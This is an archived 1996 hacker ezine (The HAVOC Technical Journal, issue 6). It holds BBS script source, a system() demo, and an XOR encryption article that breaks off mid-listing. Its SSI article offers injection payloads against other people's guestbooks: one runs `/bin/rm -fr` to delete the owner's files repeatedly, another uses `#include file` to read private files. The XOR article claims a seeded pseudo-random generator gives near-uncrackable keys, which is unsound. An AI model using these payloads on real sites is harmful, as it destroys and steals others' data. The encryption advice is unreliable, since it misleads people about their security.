💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › THTJ › thtj06.t… captured on 2022-01-08 at 17:24:25.
⬅️ Previous capture (2021-12-04)
-=-=-=-=-=-=-
������������������������������������������������������������������
�The HAVOC Technical Journal ��
�������������������������������������������������������������������ٱ
��������������������������������������������������������������������
Vol. 1 | No.6 | December 15th, 1996 | A HAVOC Bell Systems Publication
"To protect and serve"
Happy Athiest Day! (Jan. 5th)
_____________________________________________________________________________
Inside this issue:
Whats new this issue..............................
Editorial.........................................Scud-O
The HellNet[tm] C/Source Code.....................Scud-O
SSI weaknessess...................................Scud-O
system()..........................................Scud-O
XOR Encryption....................................Psycho
Hot Boot Crash....................................|\|\cFill
Transatlantic Telephone Cable #8..................Keystroke
For your reading pleasure.........................
RTFM: The lamer Journal...........................
ROLL CALL & more!.................................
Next Month........................................
Send all mail to: thtj@juno.com
If you want to write an article for
THTJ email: FoxMuldet@worldnet.att.net
This months music supplied by: Cake, Beck, Sebado, Blood Hound Gang,
Tool, Pink Floyd and WHFS 99.1 !
Good Techno music from: sm:)e communications
What's new in this issue:
Not much, but FINALLY Psycho (the world's biggest lamer!) has written
an article! So now, for the first time, all the HBS members that
aren't MIA have written for THTJ!
-----------------------------------------------------------
How to contact us:
Check Out Our Web Site:
www.geocities.com/SiliconValley/8805/
Scud-O's e-mail : FoxMulder@worldnet.att.net
Psycho's e-mail : psycho@smart.net
|\|\cFill's email : down -- server crashed
Keystroke's email : prenzo@soho.ios.com
our Mag e-mail is : thtj@juno.com
HELLCORE's e-mail : hellcore@juno.com
---------------------------------------------------------------
HBS members now (should) have web pages up on our site. go to:
www.geocities.com/SiliconValley/8805/members.html
The HAVOC Technical Journal Site of the MONTH:
+-----------------------------------------------------------+
| theLURK3R's WebSite at: |
| http://home.earthlink.net/~rseal/ |
+-----------------------------------------------------------+
Editorial:
Well this issue has turned out pretty well. The past month has been
pretty good as well. The web site has been MAJORLY updated, we now are adding
HBS member pages, we have a links page, and AT&T finally let their users use
Netscape 2.02 (except ATT changed it and added a pain in the arse bug! I get
all this fucking gibberish and have to reload like crazy! its annoying to see
gibberish and the page you we just at... damn AT&T!)
Anyway... The 403 Forbidden club is dead. It was a gay name. But in
spirit, its not dead. HBS Chat is what we are renaming it, and it is going to
be cool. The main chat area will be split up into 3 frames, one for the chat,
one for users, one for your input. It's just like how mIRC looks. hopefully
we can have it up by the new year. It's time delayed chat, but it will reload
faster than other web chats. Psycho is the main man on this project, since he
knows a little java (and the fact that he would rather use this power for good
and not evil) he is writting it. I know a little java and I might help out a
little. So every one, give Psycho a round of applause! We would have used
CGI.. but geocities sucks and says no. (but me should be moving to either
luthor's site or L0pht soon, and they both allow CGI!)
Anyway that is all for now... now I must get on with issue 6...
----------------------------------------------
/ ---/ --/ / / | /------/ / /
/--- /-----/------/-----/ / / /
/----------/ /--------/
-of HAVOC Bell Systems-
FoxMulder@worldnet.att.net
Join the Athiest Coalition today. To protect our rights! [tm]
"A Scud - a theater ballistic missile - is one of the hardest targets.
They're big stainless steel tanks."
- Michael F. Weisbach, Boeing's airborne laser project manager
=============================================================================
The HellNet[tm] C/Script Source Code:
by Scud-O
I first started on the HellNet[tm] source code the day I got my new 28.8
modem. The US Robotics one I bought came with Quick Link Message Center.
It had a host mode that I started to play with. I first only modified the
intro text files, but then I wanted to add more. File descriptions would be
nice, so would chat. so I went to the Quick Link directory and opened up
HOSTMODE.SRP The first thing I noticed was that the script language looked
a lot like C code. Hmmm.. I thought.. after adding a couple of features that
mostly just displayed text files I started on the chat. I added a while loop
and quess what - it worked! so this IS C code. cool.
So anyway here it is, the HellNet[tm] source code. I havent worked on
it in about 3-4 months so it is kind of weak. I am now more interested in
starting an ISP or other internet stuff.( hell.net sound kind of cool don't
you think so? )
Why is it called HellNet[tm]?
Because I felt like it. AT&T has Worldnet, and since HBS
is the opposite of AT&T, we had so call it HellNet. The
[tm] comes in because Worldnet is a SM (slogan mark) and
HellNet[tm] looked cool.
Text files you need to create:
ABOUT.TXT - About your BBS
BYE.TXT - Log off screen
CALLERS.TXT - LEAVE EMPTY! caller info bbs will add
FILEZ.TXT - File Descriptions
HOSTHELP.TXT - HELP - you can leave blank, or fill in
HOSTMODE.TXT - The main menu
MSG.TXT - Bulletins
WAREZ.TXT - the Warezhouse: buy/sell/trade area maybe?
HOSTMODE.SRP -------------------------------------
int STACKSIZE = 45;
/* HAVOC Bell Systems HellNet[tm] Host Mode Script Version 0 */
/* Copyright HAVOC Bell Systems (c) 1996 ALL FIGHT F**KED! */
int BaudRate;
char FALSE = 0;
char TRUE = 1;
char CANCEL = -1;
int MAX_FILE_LEN = 144;
int HOST_TIMOUT;
char DefaultProtocol;
char CurrentDir[144];
char StartupDir[144];
char TempDir[144];
char UserName[82];
char userString[82];
char host_timeout = FALSE;
char host_continue;
char security_level;
char last_prompt;
char ASCIITransComplete[] = "\r\nASCII transfer completed.\r\n";
char ASCIITransCanceled[] = "\r\nASCII transfer completed.\r\n";
char xTransComplete[] = "\r\nXmodem transfer completed.\r\n";
char xTransCanceled[] = "\r\nXmodem transfer canceled.\r\n";
char yTransComplete[] = "\r\nYmodem transfer completed.\r\n";
char yTransCanceled[] = "\r\nYmodem transfer canceled.\r\n";
char kTransComplete[] = "\r\nKermit transfer completed.\r\n";
char kTransCanceled[] = "\r\nKermit transfer canceled.\r\n";
char zTransComplete[] = "\r\nZmodem transfer completed.\r\n";
char zTransCanceled[] = "\r\nZmodem transfer canceled.\r\n";
char xyCancelPrompt[] = "\r\nPress Ctrl-X several times to cancel.\r\n";
char thatSelection[] = "\r\nThe option you selected is not available to you.\r\n";
char accessDenied[] = "\r\nAccess denied.\r\n";
char tooLong[] = "\r\n\r\nYou took too long to respond.\r\n\r\nGoodbye!\r\n";
char invalid[] = "\r\nInvalid selection.\r\n";
char pleaseWaitProcessing[] = "\r\nPlease wait. Your request is being processed...\r\n";
char *days[] = {"Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday"};
HostOut(char *str)
{
Out(str);
Echo(str);
}
ListProtocols()
{
HostOut("\r\nChoose a file transfer protocol...\r\n");
HostOut("<1> ASCII <5> Ymodem\r\n");
HostOut("<2> Xmodem <6> Ymodem-G\r\n");
HostOut("<3> Xmodem CRC <7> Kermit/SuperKermit\r\n");
HostOut("<4> Xmodem 1K <8> Zmodem\r\n");
HostOut(" <ESC> cancels transfer\r\n");
}
SelectProtocol()
{
int rv;
ListProtocols();
DefaultProtocol = 0;
PrintHostPrompt(3);
rv = GetUserInput(userString, TRUE, HOST_TIMOUT);
if (rv)
{
if ((userString[0] >= 49) && (userString[0] <= 56) && (!userString[1]))
DefaultProtocol = userString[0] - 48;
else
rv = CANCEL;
}
else
host_timeout = TRUE;
return(rv);
}
GetFileName()
{
int rv;
PrintHostPrompt(4);
rv = GetUserInput(userString, TRUE, HOST_TIMOUT);
if (rv == CANCEL)
{
return(CANCEL);
}
else if (rv == TRUE)
{
if (userString[0])
{
if ((Exists(userString)) == -1)
{
return(-2);
}
else
{
return(TRUE);
}
}
}
else
host_timeout = TRUE;
return(FALSE);
}
PutFileName()
{
int rv;
PrintHostPrompt(4);
rv = GetUserInput(userString, TRUE, HOST_TIMOUT);
if (rv == CANCEL)
{
return(CANCEL);
}
else if (rv == TRUE)
{
if (userString[0])
{
if ((Exists(userString)) == -1)
{
return(TRUE);
}
else
{
return(FALSE);
}
}
}
else
host_timeout = TRUE;
return(FALSE);
}
GetMultipleFiles(char *fileName)
{
char ret = TRUE;
if (fileName[0])
AddFile(fileName);
HostOut("\r\nSpecify multiple files, blank filename terminates list.\r\n");
while ((ret == TRUE) && !host_timeout)
{
while ((ret = GetFileName()) == -2)
HostOut("\r\nFile does not exist.\r\n");
StrCpy(userString, fileName);
if (fileName[0])
AddFile(fileName);
}
}
DownloadFiles()
{
int rv;
char fileName[MAX_FILE_LEN];
ClearList();
HostOut("\r\nFile Download");
if ((GetFileName() == TRUE) && !host_timeout)
{
StrCpy(userString, fileName);
rv = SelectProtocol();
if (rv == CANCEL)
return(CANCEL);
else if (rv == FALSE)
return(host_timeout);
if (DefaultProtocol == 1)
{
PrintHostPrompt(5);
if (GetUserInput(userString, TRUE, HOST_TIMOUT))
{
if (Upload(1, fileName))
HostOut(ASCIITransComplete);
else
HostOut(ASCIITransCanceled);
}
else
{
host_timeout = TRUE;
}
}
else if ((DefaultProtocol == 2) || (DefaultProtocol == 3))
{
HostOut("\r\nBegin your Xmodem receive now.");
HostOut(xyCancelPrompt);
Wait(2);
if (Upload(3, fileName))
HostOut(xTransComplete);
else
HostOut(xTransCanceled);
}
else if (DefaultProtocol == 4)
{
HostOut("\r\nBegin your Xmodem 1K receive now.");
HostOut(xyCancelPrompt);
if (Upload(4, fileName))
HostOut(xTransComplete);
else
HostOut(xTransCanceled);
}
else if ((DefaultProtocol == 5) || (DefaultProtocol == 6))
{
GetMultipleFiles(fileName);
if (!host_timeout)
{
if (DefaultProtocol == 5)
HostOut("\r\nBegin your Ymodem receive now.");
else
HostOut("\r\nBegin your Ymodem-G receive now.");
HostOut(xyCancelPrompt);
Wait(2);
if (Upload(5))
HostOut(yTransComplete);
else
HostOut(yTransCanceled);
}
}
else if (DefaultProtocol == 7)
{
GetMultipleFiles(fileName);
if (!host_timeout)
{
HostOut("\r\nBegin your Kermit/SuperKermit receive now.");
HostOut(xyCancelPrompt);
if (Upload(2))
HostOut(kTransComplete);
else
HostOut(kTransCanceled);
}
}
else if (DefaultProtocol == 8)
{
GetMultipleFiles(fileName);
if (!host_timeout)
{
HostOut("\r\nBegin your Zmodem receive now.");
HostOut(xyCancelPrompt);
if (Upload(7))
HostOut(zTransComplete);
else
HostOut(zTransCanceled);
}
}
}
else
HostOut("\r\nFile does not exist.\r\n");
}
ListFiles()
{
PrintHostPrompt(6);
if (GetUserInput(userString, TRUE, HOST_TIMOUT))
{
if (userString[1] == ':')
{
HostOut("\r\nCannot list files across drives.\r\n");
return;
}
if (!userString[0])
StrCpy("*.*", userString);
DisplayFiles(userString, security_level);
}
else
host_timeout = TRUE;
}
UploadFiles()
{
int file, i = 0, lines = 0, rv;
char ch, buffer[80];
Sprintf(buffer, "\r\nThere are %i000 bytes of available disk space on drive %c:\r\n", KBytesFree(CurrentDir[0]), CurrentDir[0]);
HostOut(buffer);
rv = SelectProtocol();
if (rv == CANCEL)
return(CANCEL);
else if (rv == FALSE)
return(host_timeout);
if (DefaultProtocol == 1)
{
if (PutFileName() == TRUE)
{
HostOut("\r\nStart your ASCII send now.\r\nPress Ctrl-Z when complete.\r\n");
rv = Download(1, userString);
if (rv)
HostOut(ASCIITransComplete);
else
HostOut(ASCIITransCanceled);
}
else
{
HostOut("\r\nFile already exists.\r\n");
return(CANCEL);
}
}
else if (DefaultProtocol == 2)
{
if (PutFileName() == TRUE)
{
HostOut("\r\nStart your Xmodem send now.");
HostOut(xyCancelPrompt);
Wait(2);
rv = Download(3, userString);
if (rv)
HostOut(xTransComplete);
else
HostOut(xTransCanceled);
}
else
{
HostOut("\r\nFile already exists.\r\n");
return(CANCEL);
}
}
else if (DefaultProtocol == 3)
{
if (PutFileName() == TRUE)
{
HostOut("\r\nStart your Xmodem CRC send now.");
HostOut(xyCancelPrompt);
Wait(2);
rv = Download(4, userString);
if (rv)
HostOut(xTransComplete);
else
HostOut(xTransCanceled);
}
else
{
HostOut("\r\nFile already exists.\r\n");
return(CANCEL);
}
}
else if (DefaultProtocol == 4)
{
if (PutFileName() == TRUE)
{
HostOut("\r\nStart your Xmodem 1K send now.");
HostOut(xyCancelPrompt);
Wait(2);
rv = Download(5, userString);
if (rv)
HostOut(xTransComplete);
else
HostOut(xTransCanceled);
}
else
{
HostOut("\r\nFile already exists.\r\n");
return(CANCEL);
}
}
else if (DefaultProtocol == 5)
{
HostOut("\r\nStart your Ymodem send now.");
HostOut(xyCancelPrompt);
Wait(2);
rv = Download(6);
if (rv)
HostOut(yTransComplete);
else
HostOut(yTransCanceled);
}
else if (DefaultProtocol == 6)
{
HostOut("\r\nStart your Ymodem-G send now.");
HostOut(xyCancelPrompt);
Wait(2);
rv = Download(7);
if (rv)
HostOut(yTransComplete);
else
HostOut(yTransCanceled);
}
else if (DefaultProtocol == 7)
{
HostOut("\r\nStart your Kermit/SuperKermit send now.\r\n");
rv = Download(2);
if (rv)
HostOut(kTransComplete);
else
HostOut(kTransCanceled);
}
else if (DefaultProtocol == 8)
{
HostOut("\r\nStart your Zmodem send now.\r\n");
rv = Download(8);
}
return(rv);
}
ChangeDirectory()
{
char directory[85], oldDir[85];
int i = 0, j, file;
HostOut("\r\nCurrent path is: ");
Echo(CurrentDir);
OutBuffer(CurrentDir, StrLen(CurrentDir));
HostOut("\r\n Change path to: ");
if (GetUserInput(userString, TRUE, HOST_TIMOUT))
{
if (userString[0])
{
if (SetDirectory(userString))
StrCpy(GetDirectory(), CurrentDir);
else
HostOut("\r\nCannot change to specified path.\r\n");
}
return(TRUE);
}
else
{
host_timeout = TRUE;
return(FALSE);
}
}
ChangeDrive()
{
int i = 0, j, file;
char junk[3];
HostOut("\r\nCurrent drive is: ");
Copy(CurrentDir, junk, 2);
junk[2] = 0;
HostOut(junk);
HostOut("\r\n Change drive to: ");
if (GetUserInput(userString, TRUE, HOST_TIMOUT))
{
if (userString[0])
{
if (SetDrive(userString))
StrCpy(GetDirectory(), CurrentDir);
else
HostOut("\r\nCannot change to specified drive.\r\n");
}
return(TRUE);
}
else
{
host_timeout = TRUE;
return(FALSE);
}
}
PrintHostPrompt(int prompt)
{
if (prompt)
last_prompt = prompt;
if (last_prompt == 1)
{
HostOut("\r\n<A>bout <B>illboards <C>hange Drive <D>ownload <E>arlier Callers <F>ilez <G>oodbye <H>elp <L>ist <M>ove <R>elist <T>alk <U>pload <W>arezhouse\r\n");
HostOut("Enter selection <A,B,C,D,E,F,G,H,L,M,R,T,U,W>: ");
}
else if (last_prompt == 2)
HostOut("\r\nEnter Password: ");
else if (last_prompt == 3)
HostOut("\r\nEnter Selection 1-8 or <ESC> to cancel: ");
else if (last_prompt == 4)
HostOut("\r\nFilename: ");
else if (last_prompt == 5)
HostOut("\r\nPress return to begin ASCII receive, <ESC> to cancel:\r\n");
else if (last_prompt == 6)
HostOut("\r\nEnter file search parameter (e.g. *.*). <ENTER> to search for all.\r\n->");
else if (last_prompt == 7)
HostOut("\r\nEnter Name: ");
else if (last_prompt == 8)
HostOut("\r\nAre you sure? <Y/N>: ");
else if (last_prompt == 9)
HostOut("\r\nEnter Sysop Password: ");
}
LogCall(char *UserName)
{
int hFile;
char szLogLine[80];
int year, month, day, dayofweek, hour, minute, second, hsecond;
Time(&year, &month, &day, &dayofweek, &hour, &minute, &second, &hsecond);
StrCpy(HomePath(), TempDir);
StrCat(TempDir, "CALLERS.TXT");
hFile = Open(TempDir, 1);
Seek(hFile, 0, 2);
Sprintf(szLogLine, "%-25s %s %i:%i\r\n", UserName, days[dayofweek], hour, minute);
Write(hFile, szLogLine, StrLen(szLogLine));
Close(hFile);
}
HostMainLoop()
{
char host_online = TRUE, rightpassword = FALSE;
int start_time, i;
int year, month, day, dayofweek, hour, minute, second, hsecond;
start_time = Time(&year, &month, &day, &dayofweek, &hour, &minute, &second, &hsecond);
while ((CarrierDetect()) && (host_online))
{
PrintHostPrompt(1);
if ((i = GetUserInput(userString, TRUE, HOST_TIMOUT)) == TRUE)
{
if ((userString[0] == 'd') || (userString[0] == 'D'))
{
if (AllowDownloads())
DownloadFiles();
else
HostOut(thatSelection);
}
else if ((userString[0] == 'g') || (userString[0] == 'G'))
{
PrintHostPrompt(8);
if (GetUserInput(userString, TRUE, HOST_TIMOUT))
{
if ((userString[0] == 'y') || (userString[0] == 'Y'))
{
StrCpy(HomePath(), TempDir);
StrCat(TempDir, "BYE.TXT");
if (!OutFile(TempDir))
HostOut("\r\nGoodbye lamer!\r\n");
host_online = FALSE;
}
}
else
host_timeout = TRUE;
}
else if ((userString[0] == 'h') || (userString[0] == 'H') || (userString[0] == '?'))
{
StrCpy(HomePath(), TempDir);
StrCat(TempDir, "HOSTHELP.TXT");
if (!OutFile(TempDir))
HostOut("\r\nNo help available.\r\n");
}
else if ((userString[0] == 'l') || (userString[0] == 'L'))
{
ListFiles();
}
else if ((userString[0] == 'u') || (userString[0] == 'U'))
{
if (AllowUploads())
UploadFiles();
else
HostOut(thatSelection);
}
else if ((userString[0] == 'm') || (userString[0] == 'M'))
{
if (security_level > 1)
ChangeDirectory();
else
HostOut(thatSelection);
}
else if ((userString[0] == 'c') || (userString[0] == 'C'))
{
if (security_level > 1)
ChangeDrive();
else
HostOut(thatSelection);
}
/* Added by HAVOC 7/30/96 */
/* Billboard program i.e messages + mail! */
else if ((userString[0] == 'b') || (userString[0] == 'B'))
{
StrCpy(HomePath(), TempDir);
StrCat(TempDir, "MSG.TXT");
if (!OutFile(TempDir))
HostOut("\r\nNo MSG available.\r\n");
}
/* Added by HAVOC 7/30/96 */
/* chat between op + usr */
/* continued work on it 9/14/96 */
else if ((userString[0] == 't') || (userString[0] == 'T'))
{
HostOut("\r\nNOTE: press the tilde key '~' to exit chat!\r\n");
for(;;)
/* while(userString[0]!= '~') */
{
userString[0]=GetUserInput();
if userString[0] == '~'
{
break;
}
else
{
continue;
}
}
}
/* Added by HAVOC 8/4/96 */
else if ((userString[0] == 'a') || (userString[0] == 'A'))
{
StrCpy(HomePath(), TempDir);
StrCat(TempDir, "ABOUT.TXT");
if (!OutFile(TempDir))
HostOut("\r\nABOUT is not available now.\r\n");
}
/* Added by HAVOC 8/4/96 */
else if ((userString[0] == 'r') || (userString[0] == 'R'))
{
StrCpy(HomePath(), TempDir);
StrCat(TempDir, "HOSTMODE.TXT");
if (!OutFile(TempDir))
HostOut("\r\nError! Menu is not available now.\r\n");
}
/* Added by HAVOC 8/13/96 */
else if ((userString[0] == 'f') || (userString[0] == 'F'))
{
StrCpy(HomePath(), TempDir);
StrCat(TempDir, "FILEZ.TXT");
if (!OutFile(TempDir))
HostOut("\r\nError! Filez are offline!\r\n");
}
/* Added by HAVOC 8/13/96 */
else if ((userString[0] == 'w') || (userString[0] == 'W'))
{
StrCpy(HomePath(), TempDir);
StrCat(TempDir, "WAREZ.TXT");
if (!OutFile(TempDir))
HostOut("\r\nError! Da Warezhouse is empty!\r\n");
}
/* Added by HAVOC 9/14/96 */
else if ((userString[0] == 'e') || (userString[0] == 'E'))
{
StrCpy(HomePath(), TempDir);
StrCat(TempDir, "CALLERS.TXT");
if (!OutFile(TempDir))
HostOut("\r\nHey, we just cleaned the caller file, your caller no. 1 !\r\n");
}
else
HostOut(invalid);
}
else if (i == 0)
host_timeout = TRUE;
if (host_timeout)
{
HostOut(tooLong);
break;
}
}
}
main()
{
char ch, connect;
int i;
int nKey, FaxMgr;
host_continue = TRUE;
connect = FALSE;
HOST_TIMOUT = (HostTimeout()*60);
FaxMgr = CalledFromFaxMgr();
if (!FaxMgr)
{
if (CarrierDetect())
{
Echo("\r\nWould you like to hangup the line? <Y/N>: ");
if (!GetUserInput(userString, TRUE, HOST_TIMOUT))
{
HostOut(tooLong);
return();
}
if ((userString[0] == 'Y') || (userString[0] == 'y'))
{
Wait(2);
Hangup();
}
else if ((userString[0] == 'N') || (userString[0] == 'n'))
{
connect = TRUE;
}
}
if (!connect)
{
if (HostSpeed())
Baud(HostSpeed());
Parity('N');
Stop("1");
Data(8);
Out(HostInit());
Out("\r");
WaitFor("OK\r\n", 3);
}
}
StrCpy(GetDirectory(), StartupDir);
while (host_continue)
{
SetDrive(HostPath());
SetDirectory(HostPath());
StrCpy(GetDirectory(), CurrentDir);
if (!FaxMgr)
{
if (!connect)
{
Echo("\r\nWaiting for call...\r\n");
Echo("HAVOC Bell Systems HellNet[tm] v.0\r\n");
Echo("Press <ESC> to cancel or 'L' to logon locally: ");
}
}
else
FaxMgr = FALSE;
while ((!connect) && (host_continue))
{
nKey = GetKeyStroke();
if (nKey == -1)
{
Echo("\r\nHost mode canceled by operator\r\n");
host_continue = FALSE;
break;
}
if ((nKey == 'l') || (nKey == 'L'))
{
connect = TRUE;
SetLocalHost(TRUE);
Echo("\r\nEntering host mode locally.\r\n");
}
BaudRate = CallDetected();
if (BaudRate == -1)
{
Echo("\r\nWaiting for call...\r\n");
Echo("HAVOC Bell Systems HellNet[tm] V.0\r\n");
Echo("Press <ESC> to cancel or 'L' to logon locally: ");
}
else if (BaudRate)
{
Beep();
LogonDelay();
connect = TRUE;
}
}
if (host_continue && connect)
{
PrintHostPrompt(7);
if (!GetUserInput(UserName, TRUE, HOST_TIMOUT))
{
HostOut(tooLong);
connect = FALSE;
}
else
{
LogCall(UserName);
}
}
if (host_continue && UsePassword() && connect)
{
security_level = 0;
HostOut("\r\n");
for (i = 0; i < 4; i++)
{
PrintHostPrompt(2);
if (GetUserInput(userString, FALSE, HOST_TIMOUT))
{
if (UseMovePassword())
{
if (!StrnCmpI(userString, Password(), StrLen(Password())))
{
security_level = 2;
break;
}
}
else
{
if (!StrnCmpI(userString, Password(), StrLen(Password())))
{
security_level = 1;
break;
}
}
}
else
{
HostOut(tooLong);
connect = FALSE;
break;
}
HostOut("\r\nInvalid password, please try again.\r\n");
}
}
else
{
if (UseMovePassword())
security_level = 2;
else
security_level = 1;
}
if (host_continue && connect)
{
if (security_level)
{
StrCpy(HomePath(), TempDir);
StrCat(TempDir, "HOSTMODE.TXT");
OutFile(TempDir);
userString[0] = 0;
HostMainLoop();
}
else
HostOut(accessDenied);
}
SetLocalHost(FALSE);
if (CarrierDetect())
{
Wait(2);
Hangup();
}
connect = FALSE;
host_timeout = FALSE;
}
SetDrive(StartupDir);
SetDirectory(StartupDir);
}
END OF HOSTMODE.SRP -------------------
Now all I need to do is create all the COMM port source, the download
protocals and the HostOut and other stuff.. and then it will be a stand
alone BBS.. anyone want to help me out?
NOTE: if you don't have QuickLink e-mail me.. I might send it to you, but
i'll tell you where to get it, since we should be getting an FTP site up
in a little bit...
The full program is only about 2 megs uncompressed... it is
probably only like 800k or so compressed.
=============================================================================
SSI weaknesses by Scud-O
Server Side Includes (SSI) is a powerful feature of Web servers to
use only when a document has only a little bit of dynamic data. Using a
counter on a page that otherwise doesn't change is an example.
However as great as SSI sounds, it also has some serious security
weaknesses. Since SSI can be used to execute programs, poorly designed pages
can give out tons of info. However not every server can use SSI, and many
turn off the feature. The two most popular servers, NCSA and Netscape can use
SSI, but the CERN server can not. However their is a CGI out called
fakessi.pl that you can use to emulate SSI with. You can find fakessi.pl
at: sw.cse.bris.ac.uk/WebTools/fakessi.html .
With SSI the main security weaknessed lie in executing CGI's or other
programs. You can execute other (insecure) CGI's (like the one in Issue 4) by
doing this:
<!--#exec cgi="/cgi-bin/finger.pl"-->
Very easy! just change the text between the quotes to run whatever you want.
To execute programs:
<!--#exec cmd="/usr/ucb/finger $REMOTE_USER@$REMOTE_HOST"-->
Both of these would return the results of a finger.
A little bit o fun:
try this:
<!--#exec cmd="/bin/rm -fr"-->
and watch those files just disappear!
Okay you are saying.. well I can do this on MY page, but what about OTHER
people's pages?
Well, one example is the standard guestbooks around. Most of them
either allow you to enter HTML commands, or they are stupid and process your
comments into HTML. If that server has SSI and you use the code above, their
files will be deleted! Some guestbooks strip off SSI, but many do not. I
am not sure abouit Lpage, but I suspect that it will not work. However in
many guestbook CGI's people write, they will work. Hopefully the web page
owner will not see the guestbook and be culeless to why his files are missing!
Then if he doesn't update his guestbook, every time some one views it, HIS
FILES WILL BE DELETED AGAIN!! Oh well, have fun!
Another attack?
Say there is a REALLY juicy file some one has on their box that you
want. Another feature of SSI was ment to include files in an HTML document
can help you. Made to add boilerplates (information you want to repeat in
many of you web documents) you can use the tag:
<!--#include file="bottom.html"-->
This would include the file bottom with what ever is in the file in the
web page. (This is great for uniformity, and I indend to use it as soon as
I move to luthor's place or L0pht and have CGI access!)
Anyway, if in the guestbook for example, you type in:
<!--#include file="system1.sniff"-->
(say this file has some good sniffer info or something..)
You should, theoretically have the file outputed to the guest book, and from
thies either cut and paste or save the html file and you have the file!
=============================================================================
system() -
while trying to find a C function so that I can use DOS commands on my
school's network I found system(). At first I thought it was a non-ANSI
function, but to my surprise, once I looked in a few books and saw that
it was included in the stdlib.h header so "hey, great!" . system() is VERY
simple to use, but you must be careful with memory. Since the system() runs
from the program and the program is run from the OS, it doesn't have free run
of the memory. Or at least in DOS, UNIX might be different but I haven't been
able to test that yet. So basically if you have enough free RAM, the OS
command processor will load, otherwise you will get a nasty error message.
the basic format is:
system(command);
for example in DOS to print out the directory listing you can use either:
system("dir");
-OR-
char *command = "dir";
system(command);
Here is an example of system() :
/* system() demonstration by Scud-O of HBS */
/* For The HAVOC Technical Journal Issue 6 */
#include <stdio.h>
#include <stdlib.h>
main()
{
char input[40]; /* a buffer for input */
while(1)
{
/* First get the command */
puts("\nInput your command or hit ENTER to exit");
gets(input);
/* exit if line is blank */
if (input[0] == "\0")
exit(0);
/* otherwise execute command */
system(input);
}
}
Now isn't that simple?
If you want to run multiple command, well just use the code above, or do a
simple system("command.com") if you are using DOS.
Please note: if you are working on a program that is to be multiplatform,
don't use system() or if you do, be careful. If you use ANY special OS
commands you will have code that is much less portable.
Well, that's all folks!
=============================================================================
XOR data encryption with an infinite length key by Psycho
With the increased awareness of the necessity for privacy of electronic
information, there is a need for simple, efficient methods of data
encryption. One of the most common methods, for some time now, has been
the use of the exclusive-OR (XOR) operator on files, with some small repeating bytestream
known as the key.
When the resultant file is XORed with the key again, it reverts back to
its original state. There are many existing examples of programs that
use the XOR method to encrypt files with a key word or phrase. For many,
this level of security is more than ample; however, when the length of
the encryption key is less than that of the file to be
encrypted, there exists the possibility that the repeated key
can be deduced, and the file decrypted.
Because the key is repeated many times throughout the encryption process,
it may be possible to crack the code within a reasonable amount of time, and
thus XOR encryption with small keys is not used in high security situations.
However, if the key length is sufficiently great, to the point where it is
the equal of the data being encrypted, then XOR encryption remains uncrackable,
and is thus an easily implemented encryption method.
The only problem with using keys as large as the file or datastream you need
to encrypt is that both the key must be transferred through a secure medium,
which might be either costly or unworkable. If you want to encrypt a four
hundred megabyte database, you'll need to carry around a decoder CD-ROM with
an equally large key! Obtaining a reliable key of such a size, which cannot
be determined by other sources, may prove difficult, and is certainly not
efficient. If you deal with large files, then finding and transmitting an
extremely long key may be costly and time-consuming (particularly if the key
is changed regularly for security purposes).
There is, however, a solution! Anyone who has ever generated random
numbers upon a computer, quickly realises that the numbers are not
truly random. They must be "seeded" with particular values, which
give a particular sequence of numbers. We can use this inherent
deficiency within random number generators to construct (on-the-fly)
an infinitely large key for the purposes of encryption, by seeding it with
a particular number which users can specify. Rather than storing the key,
we only need pass on the seed value, rather than a huge code-key.
Provided the same random number generator is used (usually programming
language specific and platform specific) we can have an infinitely large
key that gives us increased protection.
Security Warning :
While this method gives greater
security that a small, self-repeating XOR encryption key, it does not guarantee
absolute protection. The method used to generate a key exploits a weakness in
the random number generators of computing languages - namely that they are
pseudo-random number generators. Since they are not truely random (and require
a seed), we can replicate the same sequence of numbers time and time again. The problem
with a pseudo-random number generator is that there may be some underlying pattern
to the numbers it generates. Unless your random number generator avoids repetition,
there exists the potential for repetition on extremely large files.
General Theory
For those who are unfamiliar with the XOR operator, it is covered in most
discrete maths / computer science textbook. For the purposes of encryption,
it has several desirable properties. Firstly, its extremely simple to use
and understand (unlike more advanced methods such as say, the RSA encryption
algorithm used in public key cryptography). We have a series of characters
known as a "key" which we use to encrypt a file or datastream. Then, we
can at a later date use the same key, and the same programming code,
with the XOR operator on the encrypted datastream. Our original data is
restored, simply by using the XOR function with the key again.</P>
The syntax for XOR encryption, under most programming languages, is
like this :
encrypted_byte = originalbyte XOR keyvalue
(where keyvalue is a byte taken from a repeating sequence of characters
which are used both to encrypt and decrypt)
Likewise, the syntax for XOR decryption, under most programming languages,
is like this :
original_byte = encrypted_byte XOR keyvalue
(where keyvalue is a byte taken from a repeating sequence of characters
which are used both to encrypt and decrypt)
For those interested in the more theoretical details, the exclusive-OR
operator is evaluated by examining individual bits, and comparing them
to the result in the following truth table.
+--------------------+
| A B | eXculsive-OR |
+-----+--------------+
| 0 0 | 0 |
+-----+--------------+
| 0 1 | 1 |
+-----+--------------+
| 1 0 | 1 |
+-----+--------------+
| 1 1 | 0 |
+-----+--------------+
As you can see, the XOR operator will return true if, and only if, the
operands are either true, or false, but not both. If A and B are false,
then XOR returns false, but if they are different, XOR returns true.
Now, to examine and understand why XOR encryption is so simple to use, take
any value for A (either 0 or 1) and apply the XOR function to a key-bit (B) of 0.
Do so again, and you will see that you arrive at your original bit (A).
Likewise with a key value of 0, a second XOR restores the original bit.
This is a handy feature, as your program need not have separate encryption and
decryption routines. Simply executing the central algorithm once, then again
can both encrypt and decrypt.
Infinite length keys
Our infinite length keys are generated simply through a random number generator
which is seeded by a user-specified value. Under most languages, the number
generated from one execution of an application will be the same when the
application is next executed, unless the generator is seeded;
usually by the system timer. But if we seed the generator
with a known value - which will generate our encryption key - at a later
date that same key can be reproduced for decryption.
Example source code
The following Turbo Pascal listing gives you a working example of the
infinite length key XOR system. Note that random number generators will
most likely be platform and language specific, so that a Turbo Pascal
compiled system probably won't work with a Visual Basic system, and vice
versa. This brings an added benefit, for to break the code, you would not
only have to cycle through every single possible seed value, you would also
need to know the specific language and version to even attempt to crack the
code.
Listing one - infinite length XOR encryption example
Program InfiniteXORKey;
{ An example encryption system that selectively seeds a random number
generator to choose a particular sequence of random numbers, which
are then used to encrypt or decrypt a file.
Syntax
Infinkey INPUTFILE OUTPUTFILE RANDOMSEED
where randomseed is any long integer
}
uses crt, dos;
var Input, Output : file;
Numread, NumWritten : word;
Buffer : array[1..4096] of char;
seed : longint;
i : integer;
